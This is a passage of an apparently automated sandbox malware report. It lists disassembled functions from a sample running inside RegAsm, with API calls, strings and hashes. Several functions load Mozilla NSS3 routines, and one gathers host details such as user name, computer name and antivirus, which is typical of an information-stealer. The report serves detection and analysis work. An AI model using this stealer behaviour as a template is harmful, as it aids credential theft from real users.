                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3332421221-0
                                                                                                        • Opcode ID: d83ec2da0be09ffd522681bc72a19d74cbbeef8f1f7a09bc394b9b7f87e09d01
                                                                                                        • Instruction ID: 73954575a890bd7703c7e8edb85e591c6d7ae520d213ddc760840da0e18f956b
                                                                                                        • Opcode Fuzzy Hash: d83ec2da0be09ffd522681bc72a19d74cbbeef8f1f7a09bc394b9b7f87e09d01
                                                                                                        • Instruction Fuzzy Hash: C0210776A00104AFEF015B69EC0AADB3A78DB5234DF050131FD1896B11F733C56DC6A1
                                                                                                        Function 6C13CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C13B999), ref: 6C13CFF3
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C13B999), ref: 6C13D02B
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C13B999), ref: 6C13D041
                                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C13B999), ref: 6C28972B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log$_byteswap_ushort
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 491875419-598938438
                                                                                                        • Opcode ID: d8a60a63b2fc27b5c07bb8cb8f39a01b93f4d61d13ab33d01923978846a6044c
                                                                                                        • Instruction ID: 1b38c6597b5f82f3d502dc6a19efd36b8696a7dc3b7838d7835286e554758ea1
                                                                                                        • Opcode Fuzzy Hash: d8a60a63b2fc27b5c07bb8cb8f39a01b93f4d61d13ab33d01923978846a6044c
                                                                                                        • Instruction Fuzzy Hash: 66615BB1A002248BD710DF29C840BA7B7F5EF55318F6842ADE849AFB81D376D947C7A1
                                                                                                        Function 6C214DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C21536F,00000022,?,?,00000000,?), ref: 6C214E70
                                                                                                        • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C214F28
                                                                                                        • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C214F8E
                                                                                                        • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C214FAE
                                                                                                        • free.MOZGLUE(?), ref: 6C214FC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                        • String ID: %s=%c%s%c$%s=%s$oS!l"
                                                                                                        • API String ID: 2709355791-431619459
                                                                                                        • Opcode ID: a9676efced9e7e2610d347d627bdd9a132e4c35696ad4a83681ada906cdbce8c
                                                                                                        • Instruction ID: 5c0739ee1a2c66ac75397b3f59ef68806a82347817264480c4ca218166235e73
                                                                                                        • Opcode Fuzzy Hash: a9676efced9e7e2610d347d627bdd9a132e4c35696ad4a83681ada906cdbce8c
                                                                                                        • Instruction Fuzzy Hash: E0511321A0D15F8BEB01CA6984907FF7BF59F4630EF688126FE98E7F41D325980587A1
                                                                                                        Function 6C23EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23EF6D
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • htonl.WSOCK32(00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23EFE4
                                                                                                        • htonl.WSOCK32(?,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23EFF1
                                                                                                        • memcpy.VCRUNTIME140(?,?,6C25A4A1,?,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23F00B
                                                                                                        • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23F027
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonlmemcpy$ErrorValue
                                                                                                        • String ID: dtls13
                                                                                                        • API String ID: 242828995-1883198198
                                                                                                        • Opcode ID: 4840706e8ad89aba3f287699400790c394a43933a7a2743887a0d2ba8ca4062c
                                                                                                        • Instruction ID: 93bf059fae7e73d2c93742cc6eac85e53bc235360b1d9d877d199d764cb0078b
                                                                                                        • Opcode Fuzzy Hash: 4840706e8ad89aba3f287699400790c394a43933a7a2743887a0d2ba8ca4062c
                                                                                                        • Instruction Fuzzy Hash: 5931F3B1A012299BC710DF28DC41B9AB7E4AF49348F158129FC1C9B751E771ED19CBE1
                                                                                                        Function 6C1BAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1BAFBE
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C2D9500,6C1B3F91), ref: 6C1BAFD2
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C1BB007
                                                                                                          • Part of subcall function 6C206A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C1B1666,?,6C1BB00C,?), ref: 6C206AFB
                                                                                                        • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C1BB02F
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1BB046
                                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C1BB058
                                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C1BB060
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3627567351-3315324353
                                                                                                        • Opcode ID: 75dce70d7f73e5c7417ab85e104e93bef85dbcb13a03e551c63c617634544dc4
                                                                                                        • Instruction ID: 463a3d30a9d871b578769e8b6d5202579d3ceb52b2d9be849bbe2c0348ab985c
                                                                                                        • Opcode Fuzzy Hash: 75dce70d7f73e5c7417ab85e104e93bef85dbcb13a03e551c63c617634544dc4
                                                                                                        • Instruction Fuzzy Hash: 26310F705083049BDB208F249CC5BAA77B4AF8672CF100619EDB4ABF81E736D109CB96
                                                                                                        Function 0041F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 0041F969
                                                                                                          • Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
                                                                                                          • Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F
                                                                                                        • DName::operator+.LIBCMT ref: 0041F9C2
                                                                                                        • DName::DName.LIBCMT ref: 0041FA1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                        • API String ID: 834187326-2211150622
                                                                                                        • Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
                                                                                                        • Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
                                                                                                        • Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
                                                                                                        • Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48
                                                                                                        Function 6C1EACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C1EACE6
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1EAD14
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAD23
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAD39
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$n,l
                                                                                                        • API String ID: 332880674-1408165905
                                                                                                        • Opcode ID: be0b3a9573636e865c61fa0ce18917c2e83eb2ee0ad63181f4f8ca0e1453b2a4
                                                                                                        • Instruction ID: c06898afb07d7a30e5944271e43bc7797303de0566b91c74ee3e5721ef207791
                                                                                                        • Opcode Fuzzy Hash: be0b3a9573636e865c61fa0ce18917c2e83eb2ee0ad63181f4f8ca0e1453b2a4
                                                                                                        • Instruction Fuzzy Hash: 102104757005489FDB00DB64DD8ABAA3BB9FB4A719F054029EC0AD7E11DB359808C792
                                                                                                        Function 004212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UnDecorator::UScore.LIBCMT ref: 004212E7
                                                                                                        • DName::DName.LIBCMT ref: 004212F3
                                                                                                          • Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF
                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 00421332
                                                                                                        • DName::operator+=.LIBCMT ref: 0042133C
                                                                                                        • DName::operator+=.LIBCMT ref: 0042134B
                                                                                                        • DName::operator+=.LIBCMT ref: 00421357
                                                                                                        • DName::operator+=.LIBCMT ref: 00421364
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                        • String ID: void
                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                        • Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
                                                                                                        • Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
                                                                                                        • Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
                                                                                                        • Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748
                                                                                                        Function 00411563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                        • wsprintfA.USER32 ref: 004115BB
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                        • String ID: %dx%d
                                                                                                        • API String ID: 3940144428-2206825331
                                                                                                        • Opcode ID: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
                                                                                                        • Instruction ID: 170008d2b248a6dac6df5cacbd3238be6a4bc1abd9d224a85ffebcf6f0d8f3fd
                                                                                                        • Opcode Fuzzy Hash: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
                                                                                                        • Instruction Fuzzy Hash: 59F0C832601320BBEB249BA59C0DD9B7EAEEF467A7F005451F605D2160E6B75E4087A0
                                                                                                        Function 6C1FCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C1FCD08
                                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C1FCE16
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1FD079
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1351604052-0
                                                                                                        • Opcode ID: 2af7834c6a2353293447fa571490fb069942e3166f7ae31c4b4075d2cc69e8ae
                                                                                                        • Instruction ID: e6f91664dfa9a19a4cb9150affca0825259921b56ea9ac6c0cc8d6bc458325b9
                                                                                                        • Opcode Fuzzy Hash: 2af7834c6a2353293447fa571490fb069942e3166f7ae31c4b4075d2cc69e8ae
                                                                                                        • Instruction Fuzzy Hash: 08C18EB1A002199FDB20DF24CC80BDAB7F4BF58318F1541A8D958A7741E775EA96CF90
                                                                                                        Function 6C1B2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ZAlloc_Util.NSS3(6F09BAB5), ref: 6C1B2C5D
                                                                                                          • Part of subcall function 6C210D30: calloc.MOZGLUE ref: 6C210D50
                                                                                                          • Part of subcall function 6C210D30: TlsGetValue.KERNEL32 ref: 6C210D6D
                                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C1B2C8D
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1B2CE0
                                                                                                          • Part of subcall function 6C1B2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C1B2CDA,?,00000000), ref: 6C1B2E1E
                                                                                                          • Part of subcall function 6C1B2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C1B2E33
                                                                                                          • Part of subcall function 6C1B2E00: TlsGetValue.KERNEL32 ref: 6C1B2E4E
                                                                                                          • Part of subcall function 6C1B2E00: EnterCriticalSection.KERNEL32(?), ref: 6C1B2E5E
                                                                                                          • Part of subcall function 6C1B2E00: PL_HashTableLookup.NSS3(?), ref: 6C1B2E71
                                                                                                          • Part of subcall function 6C1B2E00: PL_HashTableRemove.NSS3(?), ref: 6C1B2E84
                                                                                                          • Part of subcall function 6C1B2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C1B2E96
                                                                                                          • Part of subcall function 6C1B2E00: PR_Unlock.NSS3 ref: 6C1B2EA9
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B2D23
                                                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C1B2D30
                                                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6C1B2D3F
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1B2D73
                                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C1B2DB8
                                                                                                        • free.MOZGLUE ref: 6C1B2DC8
                                                                                                          • Part of subcall function 6C1B3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1B3EC2
                                                                                                          • Part of subcall function 6C1B3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C1B3ED6
                                                                                                          • Part of subcall function 6C1B3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C1B3EEE
                                                                                                          • Part of subcall function 6C1B3E60: PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B3F02
                                                                                                          • Part of subcall function 6C1B3E60: PL_FreeArenaPool.NSS3 ref: 6C1B3F14
                                                                                                          • Part of subcall function 6C1B3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1B3F27
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3941837925-0
